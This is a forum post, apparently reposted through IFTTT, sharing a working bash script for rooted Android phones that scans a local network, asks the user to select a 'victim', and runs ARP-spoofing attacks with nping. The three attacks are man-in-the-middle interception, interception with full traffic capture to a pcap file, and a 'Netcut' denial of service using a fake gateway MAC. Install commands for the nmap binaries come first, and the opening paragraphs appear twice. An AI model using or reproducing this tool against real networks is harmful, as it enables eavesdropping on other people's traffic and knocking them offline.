Hello everybody
Sorry by advance for my english, i'm french.
My main phone is broken so i have a old galaxy mini (android gingerbread ) for replacement... and i want to use this for some MiTM spoofing and information gathering but app play store are not compatible or buggy for me.
The script work for me but maybe the method to get local IP/ IP GATEWAY will change for phone or android version
I post the script here maybe it way make idea for someone
So i use nmap ARM binary from nmap website ( nmap/nping ) to create a little script (182 lines) to automated MiTM it's very lightweight and easy to use.
Requirement
Features
Installation binaries
Tools mitm.bash
Sorry by advance for my english, i'm french.
My main phone is broken so i have a old galaxy mini (android gingerbread ) for replacement... and i want to use this for some MiTM spoofing and information gathering but app play store are not compatible or buggy for me.
The script work for me but maybe the method to get local IP/ IP GATEWAY will change for phone or android version
I post the script here maybe it way make idea for someone
So i use nmap ARM binary from nmap website ( nmap/nping ) to create a little script (182 lines) to automated MiTM it's very lightweight and easy to use.
Requirement
- rooted phone
- busybox
- tcpdump
- bash
Features
- MiTM arp spoofing ( Restore original gateway mac after attack )
- MiTM arp spoofing with tcpdump log data in pcap file ( Restore original gateway mac after attack )
- Netcut replace mac gateway by another fake mac address
Installation binaries
Code:
mkdir -p /sdcard/opt
cd /sdcard/opt
#get binary from nmap website
wget "http://ift.tt/293Emt5;
tar xvjf nmap-6.46-android-arm-bin.tar.bz2
#Installation to /system/xbin
cd nmap-6.46
mount -o remount,rw /system
cp -v bin/nmap /system/xbin
cp -v bin/nping /system/xbin
#Restore /system permission
mount -o ro,remount,ro /system Code:
#!/bin/bash
echo "*** Tools create by c0derz67 from forum.xda-developers.com ****";
echo -e "\n\n";
TMP_DIRECTORY="/sdcard/_nettools_$RANDOM"; # maybe change by our sdcard directory
MAIN_INTERFACE="wlan0" # change with your interface name
mkdir -p "$TMP_DIRECTORY" || (echo "Can't create $TMP_DIRECTORY";exit;);
cd $TMP_DIRECTORY || (echo "Can't chdir to $TMP_DIRECTORY";exit;);
trap "echo \"Bye bye :) remove $TMP_DIRECTORY\";rm -r $TMP_DIRECTORY;exit;" 0 1 2 3 15;
echo "[*] GET GATEWAY "
GATEWAY=$(ip route show | grep $MAIN_INTERFACE | grep -o -E "via.*dev" | cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> GATEWAY IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] GET ADRESS "
MY_ADDRESS=$(ip route show | egrep -o "src .*"|cut -d ' ' -f2);
if [ $? -eq 0 ]; then
echo " -> MY_ADDRESS IS $GATEWAY"
else
echo ERROR TO GET GATEWAY
exit;
fi
echo "[*] Get Mac address : ";
MY_MAC=$(busybox ifconfig $MAIN_INTERFACE | grep -E -o "HWaddr .*"|cut -d ' ' -f2);
if [ -n "$MY_MAC" ]; then
echo " -> Mac address is : $MY_MAC"
else
echo "ENABLE TO GET mac ADDR"
exit;
fi;
GATEWAY_FIRST_PART_IP_1=$(echo $GATEWAY | cut -d '.' -f1);
GATEWAY_FIRST_PART_IP_2=$(echo $GATEWAY | cut -d '.' -f2);
GATEWAY_FIRST_PART_IP_3=$(echo $GATEWAY | cut -d '.' -f3);
GATEWAY_FIRST_PART_IP_4=$(echo $GATEWAY | cut -d '.' -f4);
MY_ADDRESS_FIRST_PART_IP_1=$(echo $MY_ADDRESS | cut -d '.' -f1);
MY_ADDRESS_FIRST_PART_IP_2=$(echo $MY_ADDRESS | cut -d '.' -f2);
MY_ADDRESS_FIRST_PART_IP_3=$(echo $MY_ADDRESS | cut -d '.' -f3);
MY_ADDRESS_FIRST_PART_IP_4=$(echo $MY_ADDRESS | cut -d '.' -f4);
SCAN_IP_RANGE="$MY_ADDRESS_FIRST_PART_IP_1.$MY_ADDRESS_FIRST_PART_IP_2.$MY_ADDRESS_FIRST_PART_IP_3.1-255";
echo "[*] Scan : $SCAN_IP_RANGE "
nmap -n -v -sP "$SCAN_IP_RANGE" | grep -v down
echo -e "\n\n"
echo "[*] DEVICE(S) connected to network : ";
echo -e "\n";
mkdir ip || (echo "Can't create IP";exit);
GATEWAY_MAC="";
counter=0;
arp -n -a | grep -v incomplete > ARP_RESULT.txt
already_set=0;
while((1));
do
i=0;
while read line;do
i=$(($i+1));
THIS_IP=$(echo $line | egrep -o "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+" );
THIS_MAC=$(echo $line | egrep -o ".{2}:.{2}:.{2}:.{2}:.{2}:.{2}" )
if [ "$THIS_IP" = "$GATEWAY" ];then
GATEWAY_MAC=$THIS_MAC;
fi;
#echo "[$i] CURRENT MAC : $THIS_MAC ";
#echo "[$i] CURRENT IP : $THIS_IP"
echo "$i ) $THIS_IP ( $THIS_MAC ) "
if [ "$already_set" -eq 0 ]; then
mkdir $i;
echo $THIS_MAC > $i/MAC
echo $THIS_IP > $i/IP
fi;
done < ARP_RESULT.txt;
already_set=1;
echo -e "\n"
read -n 1 -p "[*] Select target ( 1-$i ) : " number_victim;
echo "";
if [ ! -d $number_victim ];then
echo "$number_victim is not a good target";
continue;
fi
TARGET_MAC=$(cat $number_victim/MAC );
TARGET_IP=$(cat $number_victim/IP );
echo -e "\n\n"
echo "[*] Select attack : ";
echo -e "\n"
echo "1) Arp Spoofing MITM (Catch and Redirect trafic to gateway) ";
echo "2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "3) Netcut Arp Spoofing replace gateway mac to invalid mac ";
echo -e "\n"
read -n 1 -p "[*] Attack type : " number_attack;
case $number_attack in
1)
clear
echo "[*] Start 1) Arp Spoofing MITM (Catch and Redirect trafic to gateway)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
sysctl -w net.ipv4.ip_forward=1
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
read -n 1
GET_PID=$!
echo -e "\n\n";
echo "********* STOP ATTACK *********";
kill -9 $GET_PID;
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
2)
clear
echo "[*] Start 2) MITM and dump all trafic to /sdcard/dump.pcap (required tcpdump)";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $MY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 99999 >log_nping.txt &
PID_nping=$!
sleep 5s;
echo "Let's see what nping say log_nping.txt : "
echo -e "\n\n";
cat log_nping.txt
echo -e "\n\n";
echo "[*] Arp spoofing (nping) running in background see $TMP_DIRECTORY/log_nping.txt for detail"
echo "[*] Running tcpdump exclude $MY_ADDRESS packet";
tcpdump -i $MAIN_INTERFACE -s0 -v -w /sdcard/dump.pcap &
PID_tcpdump=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
3)
clear
echo "[*] Start 3) Netcut Arp Spoofing replace gateway mac to invalid mac";
echo "[?] Press any key to stop "
sleep 3s;
echo "[*] Set net.ipv4.ip_forward -> 1";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac cc:cc:cc:cc:cc:cc --dest-mac $TARGET_MAC $TARGET_IP -c 99999 &
PID_nping=$!
read -n 1
echo "********* STOP ATTACK *********";
echo "[*] kill tcpdump"
kill $PID_tcpdump;
echo "[*] kill nping"
kill $PID_nping
echo "[*] Restore gateway original mac";
nping --arp --arp-type ARP-reply --arp-sender-ip $GATEWAY --arp-sender-mac $GATEWAY_MAC --dest-mac $TARGET_MAC $TARGET_IP -c 10
read -p "Wait to continue"
;;
esac
done;
done;
#ARP POISOING help
#nping --arp --arp-type ARP-reply --arp-sender-ip (GATEWAY IP) --arp-sender-mac (ATTACKER IP ) --dest-mac (MAC VICTIME) (IP VICTIM) -c 999999 from xda-developers http://ift.tt/28WOrnU
via IFTTT
No comments:
Post a Comment